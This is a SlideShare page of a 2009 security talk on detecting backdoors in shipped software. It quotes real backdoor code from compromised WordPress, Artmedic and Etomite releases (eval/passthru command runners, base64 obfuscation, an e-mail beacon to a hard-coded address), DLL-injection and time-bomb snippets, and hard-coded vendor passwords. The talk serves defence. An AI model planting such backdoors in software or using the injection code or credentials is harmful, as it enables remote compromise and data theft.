SlideShare ist ein Scribd-Unternehmen logo

Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices

Tyler Shields
Tyler Shields
Technologie
1 von 49
Detecting "Certified Pre-owned" Software and Devices Tyler Shields October 15, 2009
Contents Introduction to “Certified Pre-0wned” Backdoor Mechanisms (characteristics, examples, detection) – Special Credentials – Hidden Functionality – Unintended Network Activity Detection of Malicious Code Indicators – Rootkit like behaviors – Anti-debugging techniques – Time bombs Conclusion / Questions © 2009 Veracode, Inc. 2
Background
Certified “Pre-0wned” Software or hardware that comes with malicious behavior right out of the box. http://attrition.org/errata/cpo/ has a historical listing. Some examples: – Samsung digital photo frame infected with Sality Worm – Asus Eee Box's 80GB Hard Drive infected with W32/Taterf worm – Walmart Promo CD included custom spyware – Sony BMG CDs included XCP rootkit – Borland Interbase backdoor password © 2009 Veracode, Inc. 4
Types of Backdoors System backdoors – Malware written to compromise a system (i.e. the application itself is the backdoor) – Sometimes relies on social engineering for initial execution Crypto backdoors – Designed weakness in an algorithm to allow those who know the weakness to decrypt with far less work than brute force. © 2009 Veracode, Inc. 5
Types of Backdoors Application backdoors – the focus of this talk – Modifications to legitimate programs designed to bypass security mechanisms (i.e. applications that would already be running) – Often inserted by those who have legitimate access to source code or distribution binaries – Can result in system compromise as well – Not specific to any particular programming language © 2009 Veracode, Inc. 6
Attacker Motivation Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so can bypass AV Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection by IDS For high value targets such as financial services and government it becomes cost effective and more reliable. – Report of the Defense Science Board Task Force, “Mission Impact of Foreign Influence on DoD Software”: – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation. © 2009 Veracode, Inc. 7
Current State of Detection Application backdoors best detected by inspecting the source or binary code of the program Application backdoor scanning is imperfect – Impossible to programmatically determine the intent of application logic Backdoors in source may be detected quickly but backdoors in binaries often take years to surface – Linux backdoor attempt vs. Borland Interbase Most security code reviews focus on finding vulnerabilities with little emphasis on backdoors This talk focuses solely on static detection methods © 2009 Veracode, Inc. 8
Special Credentials
Characteristics Special credentials, usually hard-coded, which circumvent security checks – Usernames – Passwords – Secret hash or key The Keymaker from “The Matrix Reloaded” He is able to make keys that get him into secret areas of the Matrix. © 2009 Veracode, Inc. 10
Borland Interbase 4.0, 5.0, 6.0 (2001) Database software used to house large quantities of data for fortune 500 companies, educational institutions, etc. Hard-coded username “politically” with the password “correct” allowed remote access Credentials inserted into the database at startup Support for user-defined functions equates to administrative access on the server Undetected for over seven years Opening the source revealed the backdoor © 2009 Veracode, Inc. 11
Borland Interbase (cont’d) dpb = dpb_string; *dpb++ = gds__dpb_version1; *dpb++ = gds__dpb_user_name; *dpb++ = strlen (LOCKSMITH_USER); q = LOCKSMITH_USER; // Previously #defined to be “politically” while (*q) *dpb++ = *q++; *dpb++ = gds__dpb_password_enc; strcpy (password_enc, (char *)ENC_crypt (LOCKSMITH_PASSWORD, PASSWORD_SALT)); // #defined LOCKSMITH_PASSWORD to “correct” q = password_enc + 2; *dpb++ = strlen (q); while (*q) *dpb++ = *q++; dpb_length = dpb - dpb_string; isc_attach_database (status_vector, 0, GDS_VAL(name), &DB, dpb_length, dpb_string); © 2009 Veracode, Inc. 12
Intel NetStructure 7110 SSL Accelerator (2000) Administrator password overridden by an undocumented shell password known as “wizard” mode Shell password derived from MAC address of primary Ethernet interface Results in root privileges on the appliance © 2009 Veracode, Inc. 13
Cisco WLSE and HSE Software (2004) Default username and password in all releases up to that date of… – Wireless LAN Solution Engine (WLSE) – Hosting Solution Engine (HSE) Gives full access to device with complete control Username can not be disabled Upgrade to new version with default login and password removed © 2009 Veracode, Inc. 14
BrightStor ARCserve Backup UniversalAgent Backdoor (2005) Backup and restore agent created by Computer Associates Hard coded credentials in the client side agent (wide deployment) Username: x02rootx03 Password: x02<%j8U]`~+Rix03 Read access to the remote file system © 2009 Veracode, Inc. 15
EMC DiskXtender Hard Coded Password (2008) Used to manage storing of large quantities of data across multiple storage devices Software creates RPC endpoints in the installation that can be accessed remotely Endpoints contain hardcoded login and password information that allow full remote code execution Full compromise of installed host © 2009 Veracode, Inc. 16
Detection Identify static variables that look like usernames or passwords – Start with all static strings using the ASCII character set – Focus on string comparisons as opposed to assignments or placeholders – Also inspect known crypto API calls where these strings are passed in as plaintext data Identify static variables that look like hashes – Start with all static strings using the character set [0-9A-Fa-f] – Narrow down to strings that correspond to lengths of known hash algorithms such as MD5 (128 bits) or SHA1 (160 bits) – Focus on string comparisons as opposed to assignments or placeholders – Examine cross-references to these strings © 2009 Veracode, Inc. 17
Detection (cont’d) Identify static variables that look like cryptographic keys – Start with all static character arrays declared or dynamically allocated to a valid key length – Also identify static character arrays that are a multiple of a valid key length, which could be a key table – Narrow down to known crypto API calls where these arrays are passed in as the key parameter, for example: OpenSSL: DES_set_key(const_DES_cblock *key, DES_key_schedule *schedule) BSAFE: B_SetKeyInfo(B_KEY_OBJ keyObject, B_INFO_TYPE infoType, POINTER info ) – Perform a statistical test for randomness on static variables Data exhibiting high entropy is likely encrypted data and should be inspected further © 2009 Veracode, Inc. 18
Hidden Functionality
Characteristics Invisible parameters in web applications – not to be confused with hidden form fields Undocumented commands Leftover debug code – e.g. WIZ command in early sendmail – char *wiz = NULL May be combined with “special” IP addresses Number Six, a Cylon Agent, from Battlestar Galactica In exchange for access to government mainframes she helps design the navigation program subsequently used by Colonial warships, covertly creating backdoors in the program. © 2009 Veracode, Inc. 20
WordPress 2.1.1 (2007) One of two WordPress download servers compromised Two PHP files modified to allow remote command injection Detected within one week http://wordpressurl/wp-includes/feed.php?ix=phpinfo(); http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); } function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); } © 2009 Veracode, Inc. 21
Artmedic CMS 3.4 (2007) Multiple source files altered to allow remote command injection or arbitrary PHP includes Attempt at obfuscation Detected within two weeks $print = 'aWYoJF9HRVRbJ2luY2x1ZGUnXSkgaW5jbHVkZSgkX0dFVFsnaW5jbHVkZSddKTsNCmlmKCRfR0V UWydjbWQnXSkgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsNCmlmKCRfR0VUWydwaHAnXSkgZXZhbCg kX0dFVFsncGhwJ10pOw=='; eval(base64_decode($print)); which decodes to: if($_GET['include']) include($_GET['include']); if($_GET['cmd']) passthru($_GET['cmd']); if($_GET['php']) eval($_GET['php']); © 2009 Veracode, Inc. 22
Quake Server (1998) RCON command on Quake server allows administrators to remotely send commands to the Quake console with a password Bypass authentication using hard-coded password “tms” Packet source address in the 192.246.40.x subnet Affected Quake 1, QuakeWorld, and Quake 2 Win32/Linux/Solaris © 2009 Veracode, Inc. 23
Detection Recognize common patterns in scripting languages, e.g.: – Create an obfuscated string – Input into deobfuscation function (commonly Base64) – Call eval() on the result of the deobfuscation – Payload code allows command execution, auth bypass, etc. http://www.google.com/codesearch?hl=en&lr=&q=eval%5C%28base64_decode+file %3A%5C.php%24&btnG=Search Identify GET or POST parameters parsed by web applications – Compare to form fields in HTML, JSP, etc. pages to find fields that only appear on the server side © 2009 Veracode, Inc. 24
Detection (cont’d) Identify potential OS command injection vectors – In C, calls to the exec() family, system(), popen(), etc. – In PHP, standard code review techniques such as looking for popen(), system(), exec(), shell_exec(), passthru(), eval(), backticks, etc. Also, calls to fopen(), include() or require() – Analyze data flow to check for tainted parameters Identify static variables that look like application commands – Start with all static strings using the ASCII character set (depending on the protocol, hidden commands might not be human-readable text) – Focus on string comparisons as opposed to assignments or placeholders – Check the main command processing loop(s) to see if it uses direct comparisons or reads from a data structure containing valid commands © 2009 Veracode, Inc. 25
Detection (cont’d) Identify comparisons with specific IP addresses or DNS names – In C, start with all calls to socket API functions such as getpeername(), gethostbyname(), and gethostbyaddr() – Comparisons against the results of these functions are suspicious – Don’t forget to look at ports as well © 2009 Veracode, Inc. 26
Unintended Network Activity
Characteristics Listens on an undocumented port Makes outbound connections Leaks information over the network – Reads from sensitive data resources – Sends data out via SMTP, HTTP, UDP, ICMP, or other protocols Potentially combined with rootkit behavior to hide the network activity from host-based IDS In the movie, Konstantin Konali markets a computer game that everyone in the world is playing. With a sequel to the game he wants to put backdoors in all computer systems on which it gets installed, thus providing access to the police and other government systems. © 2009 Veracode, Inc. 28
Etomite CMS 0.6 (2006) PHP file modified to allow remote command injection Also sends a beacon via e-mail to a hard-coded e-mail address with the location of the compromised server Base64 encoding strikes again © 2009 Veracode, Inc. 29
Etomite CMS (cont’d) eval(base64_decode("JGhhbmRsZT1wb3BlbigkX0dFVFtjaWpdLiIgMj4mMSIsInIiKTt3aGlsZS ghZmVvZigkaGFuZGxlKSl7JGxpbmU9ZmdldHMoJGhhbmRsZSk7aWYoc3RybGVuKCRsaW5lKT49MSl7 ZWNobyAkbGluZTt9fXBjbG9zZSgkaGFuZGxlKTttYWlsKCJjaWpmZXJAbmV0dGkuZmkiLCIiLiRfU0 VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLCJFcnJvciBDb2RlICM3MjA5 MzgiKTs=")); which decodes to: $handle=popen($_GET[cij]." 2>&1","r"); while(!feof($handle)) { $line=fgets($handle); if(strlen($line)>=1) { echo $line; } } pclose($handle); mail("cijfer@netti.fi","".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'], "Error Code #720938"); © 2009 Veracode, Inc. 30
Detection Identify potential sources of sensitive information – All calls to known crypto API functions – Functions that handle sensitive data such as encryption keys, plaintext data to be encrypted, registry keys, specific file references, process information, etc. – Note the variable references that correspond to the sensitive data – Analyze data flow to identify other places these variables are used, outside of the expected set of “safe” functions, such as: Other crypto API calls strlen(), bzero(), memset(), etc. © 2009 Veracode, Inc. 31
Detection (cont’d) Identify outbound connections – In C, start with all calls to socket API functions such as connect(), sendto(), or Win32 API equivalents – Focus on any outbound connections to hard-coded IP addresses or ports – Analyze data flow to determine what type of information is being sent out Look for calls to standard file I/O or registry functions – some other piece of the backdoor could be populating the data in that location – Scripting languages such as PHP also have special function calls implementing protocols such as SMTP via the mail() function – Keep in mind that many applications automatically check the manufacturer website for updates © 2009 Veracode, Inc. 32
Detection (cont’d) Identify unauthorized listeners – In C, start with all calls to socket API functions such as bind(), recvfrom(), or Win32 API equivalents – Some knowledge of normal application traffic will be required to determine which ports, if any, are unauthorized listeners Profile binaries by examining import tables – Identify anomalies, such as the use of network APIs by a desktop-only application Unix: readelf, objdump, nm Win32: PEDump (console), PEBrowse (GUI) – Dig in deeper with a disassembler and trace code paths to the anomalous API calls © 2009 Veracode, Inc. 33
Detecting Malicious Code Indicators
Look for indicators of malicious code Indicators are not malicious by themselves but they often coincide with malicious code. They obfuscate behavior from dynamic or static analysis. Categories – Rootkit behavior – Anti-debugging – Time bombs – Code or data anomalies © 2009 Veracode, Inc. 35
Rootkit Behavior Modifies OS behavior Hides program behavior from system administration tools or other instrumentation © 2009 Veracode, Inc. 36
Detecting rootkit behavior – Using Window hooks Inject a DLL via windows hook calls. The call SetWindowsHookEx will hook a target process and load a DLL of our choosing into the target process. This DLL could then hook the IAT or execute inline hooking as desired. For example: myDllHandle = Rootkit DLL SetWindowsHookEx(WH_KEYBOARD, myKeyBrdFuncAd, myDllHandle, 0) Rootkit DLL has the myKeyBrdFuncAd defined and written. © 2009 Veracode, Inc. 37
Detecting rootkit behavior - Using Remote Threads Inject a DLL into a target process by creating and using remote threads. // This is used to find the PID of our target process PID = OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); // This is used to find the address of LoadLibraryA in our current process. We assume that the base is the same in our target thus keeping the function location the same. ADDRESS = GetProcAddress(GetModuleHandle(TEXT( "Kernel32")), "LoadLibraryA"); // The below allocates some memory in our target process BASEAD = VirtualAllocEx(PID, NULL, len_of_our_dll_name_string, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) WriteProcessMemory(PID, BASEAD, Pointer to BUF containing "c:pathtoourdll", size, NULL) CreateRemoteThread(PID, NULL, 0, ADDRESS, BASEAD, 0, NULL) © 2009 Veracode, Inc. 38
Detecting Anti-debugging Anti-debugging is the implementation of one or more techniques within computer code that hinders attempts at reverse engineering or debugging a target binary. Used by commercial executable protectors, packers, and malicious software, to prevent or slow-down the process of reverse- engineering. © 2009 Veracode, Inc. 39
Detecting Anti-debugging IsDebuggerPresent Windows API The IsDebuggerPresent API call checks to see if a debugger is attached to the running process. This is a Windows specific API call that checks the process environment block (PEB) for the PEB!BeingDebugged flag and returns its value. CheckRemoteDebuggerPresent Windows API The CheckRemoteDebuggerPresent API call takes two parameters. The first parameter is a handle to the target process while the second parameter is a return value indicating if the target process is currently running under a debugger. The word “remote” within CheckRemoteDebuggerPresent does not require that the target processbe running on a separate system. © 2009 Veracode, Inc. 40
Detecting Anti-debugging OutputDebugString on Win2K and WinXP The function OutputDebugString operates differently based on the presence of a debugger. The return error message can be analyzed to determine if a debugger is present. If a debugger is attached, OutputDebugString does not modify the GetLastError message. FindWindow OllyDbg by default has a window class of "OLLYDBG". This can be detected using a function call to FindWindow with a first parameter of "OLLYDBG". WinDbg can be detected with an identical method instead searching for the string WinDbgFrameClass. OllyDbg OpenProcess HideDebugger Detection The "Hide Debugger" plugin for OllyDbg modifies the OpenProcess function at offset 0x06. The plugin places a far jump (0xEA) in that location in an attempt to hook OpenProcess calls. This can be detected programmatically and acted upon. © 2009 Veracode, Inc. 41
Detecting Time Bombs Definition – A piece of code intentionally inserted into a software system that will set off a malicious function when specified time based conditions are met Program behavior to look for – Time comparison functions – Time retrieval functions © 2009 Veracode, Inc. 42
Time Bombs Code constructs – If Based Static Compare if( time(NULL) > 1234567890 ) { // Could be any time/date retrieval function // 1234567890 == February 13th, 2009 ... } – Init/Diff Check Init - Executed during process initialization stage time(&time1); Diff Check – Executed during long running application loop time(&time2); // Get current time (this is run periodically *daily for example* in process execution loop // Could be any time retrieval function if(difftime(time1, time2) > 1000) { // Could be any of a number of different comparison methods including subtraction BOOM(); } © 2009 Veracode, Inc. 43
Time Bombs – Init/Diff Trigger File Init: During process initialization create trigger file (+30 days in example below) GetFileTime(file, &ft, NULL, NULL); qwResult = (((ULONGLONG) ft.dwHighDateTime) << 32) + ft.dwLowDateTime; qwResult += 30 * _DAY; // Add 30 days to the retrieved file time in memory (DWORD) (qwResult & 0xFFFFFFFF ); ft.dwHighDateTime = (DWORD) (qwResult >> 32 ); ret = SetFileTime(file, &ft, &ft, &ft); // Set the trigger file time to new time (+30Days) CloseHandle(file); Diff Trigger Check – Executed during long running application loop GetFileTime((HANDLE)file, &ft, NULL, NULL); GetSystemTimeAsFileTime(&ft2); if((CompareFileTime(&ft, &ft2)) == -1) { BOOM(); } © 2009 Veracode, Inc. 44
Time Bombs Time Retrieval Functions – Direct requests for time/date – Shell time/date – File system time/date Time Formatting/Conversion Functions – Windows time / date formatting functions Can also be used to GET time / date values – Able to handle time values passed through conversions Time Difference Functions – Able to support multiple time difference functions © 2009 Veracode, Inc. 45
Identify code or data anomalies Self-modifying code – Calling eval(obfuscated code) in scripting languages – Writing into code pages or jumping/calling into data pages Unreachable code – May be part of a two-stage backdoor insertion where code is added later that calls the unreachable code Encrypted blocks of data © 2009 Veracode, Inc. 46
Conclusions
SDLC: When To Scan For Backdoors? Scan the code you are developing or maintaining before release Acceptance testing of binary code – Code delivered to you as .exe, .dll, .lib, .so Scan post development/duplication/delivery phases (samples) Validation that your development tool chain isn’t inserting backdoors Ken Thompson’s paper, “Reflections on Trusting Trust” – http://www.acm.org/classics/sep95/ – Thompson not only backdoored the compiler so it created backdoors, he backdoored the disassembler so it couldn’t be used to detect his backdoors! © 2009 Veracode, Inc. 48
Questions?

Empfohlen

A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...CODE BLUE
 
lamacchia-palladium
lamacchia-palladiumlamacchia-palladium
lamacchia-palladiumNed Hayes
 
HSM (Hardware Security Module)
HSM (Hardware Security Module)HSM (Hardware Security Module)
HSM (Hardware Security Module)Umesh Kolhe
 
Linux Security Quick Reference Guide
Linux Security Quick Reference GuideLinux Security Quick Reference Guide
Linux Security Quick Reference Guidewensheng wei
 
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsResilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsMilosch Meriac
 
Building a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsBuilding a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsPaloSanto Solutions
 
I psec
I psecI psec
I psecahmad1986jor
 
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...Mc Afee And Georgia State University Taking Aim At Network Intruders With I...
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...Tammy Clark
 

Empfohlen

A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...CODE BLUE
 
lamacchia-palladium
lamacchia-palladiumlamacchia-palladium
lamacchia-palladiumNed Hayes
 
HSM (Hardware Security Module)
HSM (Hardware Security Module)HSM (Hardware Security Module)
HSM (Hardware Security Module)Umesh Kolhe
 
Linux Security Quick Reference Guide
Linux Security Quick Reference GuideLinux Security Quick Reference Guide
Linux Security Quick Reference Guidewensheng wei
 
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsResilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security modelsMilosch Meriac
 
Building a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsBuilding a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsPaloSanto Solutions
 
I psec
I psecI psec
I psecahmad1986jor
 
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...Mc Afee And Georgia State University Taking Aim At Network Intruders With I...
Mc Afee And Georgia State University Taking Aim At Network Intruders With I...Tammy Clark
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Angelill0
 
CCNA Security - Chapter 2
CCNA Security - Chapter 2CCNA Security - Chapter 2
CCNA Security - Chapter 2Irsandi Hasan
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedArea41
 
How to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usableHow to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usableDenis Gundarev
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeAhmed Habib
 
Bloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor SpecificationsBloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor SpecificationsBloombase
 
Code Signing with CPK
Code Signing with CPKCode Signing with CPK
Code Signing with CPKZhi Guan
 
Bloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server SpecificationsBloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server SpecificationsBloombase
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0Cyber Security Alliance
 
CCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systemsCCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systemsAhmed Habib
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsVideoguy
 
Ceh v5 module 18 linux hacking
Ceh v5 module 18 linux hackingCeh v5 module 18 linux hacking
Ceh v5 module 18 linux hackingVi Tính Hoàng Nam
 
CCNA Security - Chapter 7
CCNA Security - Chapter 7CCNA Security - Chapter 7
CCNA Security - Chapter 7Irsandi Hasan
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols NetProtocol Xpert
 
Roar Presentation To School Of Psychology
Roar Presentation To School Of PsychologyRoar Presentation To School Of Psychology
Roar Presentation To School Of PsychologyResearch Services Librarian
 
Digital brici
Digital briciDigital brici
Digital briciTerence Ling
 
Preparandonos para Exportar
Preparandonos para ExportarPreparandonos para Exportar
Preparandonos para ExportarProargex Prosap
 
Digital Control of Power Electronics Training Course
Digital Control of Power Electronics Training CourseDigital Control of Power Electronics Training Course
Digital Control of Power Electronics Training CourseHamish Laird
 
Dynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong RollanDynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong Rollankristine1018
 
Email Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mailEmail Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mailRalph van der Pauw
 
4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)Djuwarsjah Linnus
 
Comments (1)
Comments (1)Comments (1)
Comments (1)السيد مانجو
 

Weitere ähnliche Inhalte

Was ist angesagt?

Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Angelill0
 
CCNA Security - Chapter 2
CCNA Security - Chapter 2CCNA Security - Chapter 2
CCNA Security - Chapter 2Irsandi Hasan
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedArea41
 
How to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usableHow to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usableDenis Gundarev
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeAhmed Habib
 
Bloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor SpecificationsBloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor SpecificationsBloombase
 
Code Signing with CPK
Code Signing with CPKCode Signing with CPK
Code Signing with CPKZhi Guan
 
Bloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server SpecificationsBloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server SpecificationsBloombase
 
CCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systemsCCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systemsAhmed Habib
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsVideoguy
 
CCNA Security - Chapter 7
CCNA Security - Chapter 7CCNA Security - Chapter 7
CCNA Security - Chapter 7Irsandi Hasan
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols NetProtocol Xpert
 

Was ist angesagt? (14)

Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09
 
CCNA Security - Chapter 2
CCNA Security - Chapter 2CCNA Security - Chapter 2
CCNA Security - Chapter 2
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromised
 
How to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usableHow to encrypt everything that moves and keep it usable
How to encrypt everything that moves and keep it usable
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management plane
 
Bloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor SpecificationsBloombase Spitfire Ethernet Encryptor Specifications
Bloombase Spitfire Ethernet Encryptor Specifications
 
Code Signing with CPK
Code Signing with CPKCode Signing with CPK
Code Signing with CPK
 
Bloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server SpecificationsBloombase Spitfire StoreSafe Security Server Specifications
Bloombase Spitfire StoreSafe Security Server Specifications
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
CCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systemsCCNA Security 012- cryptographic systems
CCNA Security 012- cryptographic systems
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing Systems
 
Ceh v5 module 18 linux hacking
Ceh v5 module 18 linux hackingCeh v5 module 18 linux hacking
Ceh v5 module 18 linux hacking
 
CCNA Security - Chapter 7
CCNA Security - Chapter 7CCNA Security - Chapter 7
CCNA Security - Chapter 7
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols IPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols
 

Andere mochten auch

Preparandonos para Exportar
Preparandonos para ExportarPreparandonos para Exportar
Preparandonos para ExportarProargex Prosap
 
Digital Control of Power Electronics Training Course
Digital Control of Power Electronics Training CourseDigital Control of Power Electronics Training Course
Digital Control of Power Electronics Training CourseHamish Laird
 
Dynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong RollanDynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong Rollankristine1018
 
Email Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mailEmail Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mailRalph van der Pauw
 
4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)Djuwarsjah Linnus
 
The Two-Step Flow Of Communication
The Two-Step Flow Of CommunicationThe Two-Step Flow Of Communication
The Two-Step Flow Of CommunicationAiyana Cruz
 
Open source & Mobility - FabMob guide
Open source & Mobility - FabMob guideOpen source & Mobility - FabMob guide
Open source & Mobility - FabMob guideFabMob
 

Andere mochten auch (10)

Roar Presentation To School Of Psychology
Roar Presentation To School Of PsychologyRoar Presentation To School Of Psychology
Roar Presentation To School Of Psychology
 
Digital brici
Digital briciDigital brici
Digital brici
 
Preparandonos para Exportar
Preparandonos para ExportarPreparandonos para Exportar
Preparandonos para Exportar
 
Digital Control of Power Electronics Training Course
Digital Control of Power Electronics Training CourseDigital Control of Power Electronics Training Course
Digital Control of Power Electronics Training Course
 
Dynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong RollanDynamics CRM by Mr. Bong Rollan
Dynamics CRM by Mr. Bong Rollan
 
Email Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mailEmail Security, The Essence of Secure E-mail
Email Security, The Essence of Secure E-mail
 
4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)4000 auto approve wordpress blogs backlink list (pr8-pr1)
4000 auto approve wordpress blogs backlink list (pr8-pr1)
 
Comments (1)
Comments (1)Comments (1)
Comments (1)
 
The Two-Step Flow Of Communication
The Two-Step Flow Of CommunicationThe Two-Step Flow Of Communication
The Two-Step Flow Of Communication
 
Open source & Mobility - FabMob guide
Open source & Mobility - FabMob guideOpen source & Mobility - FabMob guide
Open source & Mobility - FabMob guide
 

Ähnlich wie Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices

Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxYasserOuda2
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
